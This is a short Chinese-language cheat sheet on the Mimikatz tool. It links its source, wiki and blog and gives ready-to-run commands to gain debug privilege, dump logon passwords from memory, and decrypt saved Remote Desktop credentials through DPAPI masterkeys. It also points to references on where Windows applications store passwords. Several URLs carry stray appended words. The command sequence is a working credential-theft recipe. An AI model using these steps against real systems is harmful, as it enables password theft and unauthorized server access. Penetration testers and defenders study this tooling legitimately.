-
Mimikatz GitHub (源碼) https://github.com/gentilkiwi/mimikatzhtml
-
Mimikatz GitHub Wiki (包含了一些說明文檔) https://github.com/gentilkiwi/mimikatz/wikigit
-
GentilKiwi Blog (博客裏的大多數內容是用法語寫的,請使用 Chrome 瀏覽器進行自動翻譯) http://blog.gentilkiwi.com/mimikatzgithub
-
感興趣的兩個點api
-
- 提權 mimikatz privilege::debug
-
- 獲取密碼原理 mimikatz sekurlsa::logonpasswords
-
- 獲取遠程終端會話存儲密碼 // 一、獲取指定用戶下的遠程會話憑據 mimikatz "dpapi::cred /in:C:\Users\xx\AppData\Local\Microsoft\Credentials\FF359429D6F19C64BA7D3E282558EEB5" // 二、根據GUID獲取對應的masterkey mimikatz sekurlsa::dpapi // 三、注入 masterkey解密 mimikatz "dpapi::cred /in:C:\Users\xx\AppData\Local\Microsoft\Credentials\FF359429D6F19C64BA7D3E282558EEB5 /masterkey:28d1f3252c019f9cxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx16dcec8e5dbf5cd0"
-
參考瀏覽器
Password Storage Locations For Popular Windows Applications服務器
http://www.nirsoft.net/articles/saved_password_location.htmlurl
【奇技淫巧】破解遠程終端憑據,獲取服務器密碼.net